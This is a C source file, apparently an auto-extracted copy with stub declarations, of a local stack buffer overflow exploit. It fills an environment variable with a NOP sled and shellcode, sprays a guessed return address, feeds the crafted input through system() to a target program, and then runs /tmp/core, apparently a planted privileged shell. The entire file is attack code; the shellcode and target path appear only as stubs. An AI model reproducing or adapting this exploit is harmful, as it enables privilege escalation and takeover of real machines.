
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int ALIGN ;
 int DAT ;
 int DBUF ;
 char NOP ;
 int OFFSET ;
 char* PATH ;
 int atoi (char*) ;
 int fclose (int *) ;
 int * fopen (int ,char*) ;
 int fprintf (int *,char*,...) ;
 int get_sp () ;
 int memcpy (char*,char*,int) ;
 int putenv (char*) ;
 char* shellcode ;
 int sprintf (char*,char*,char*,char*) ;
 int * stderr ;
 int strlen (char*) ;
 int system (char*) ;
 int unlink (int ) ;
 int usage (char*) ;

int main(int argc, char **argv){
   char eipeip[DBUF], buffer[7192];
   char go[DBUF + 22];
   FILE *calls;
   int i, offset, align;
   long address;

   usage(argv[0]);


   unlink(DAT);
   calls = fopen(DAT, "w");
   fprintf(calls, "OWNED\n");
   fclose(calls);


   if (argc > 1) {
      offset = atoi(argv[1]);
   }
   else {
      offset = OFFSET;
   }

   if (argc > 2) {
      align = atoi(argv[2]);
   }
   else {
      align = ALIGN;
   }

   address = get_sp() - offset;

   if (align > 0) {
      for(i=0; i < align; i++) {
  eipeip[i] = 0x69;
      }
   }

   for (i=align; i < DBUF; i+=4) {
      *(long *)&eipeip[i] = address;
   }
   for (i=0; i < (7192 - strlen(shellcode) - strlen(eipeip)); i++) {
      buffer[i] = NOP;
   }


   memcpy(buffer + i, shellcode, strlen(shellcode));
   memcpy(buffer, "UPEX=", 5);
   putenv(buffer);

   fprintf(stderr, "Ret-addr: %#x, offset: %d, align: %d.\n", address, offset, align);


   sprintf(go, "(printf '1\n0\nC\n%s\n0\n')|%s", eipeip, PATH);
   system(go);

   fprintf(stderr, "Score: core wins!\n");




   system("/tmp/core");


   return 0;
}
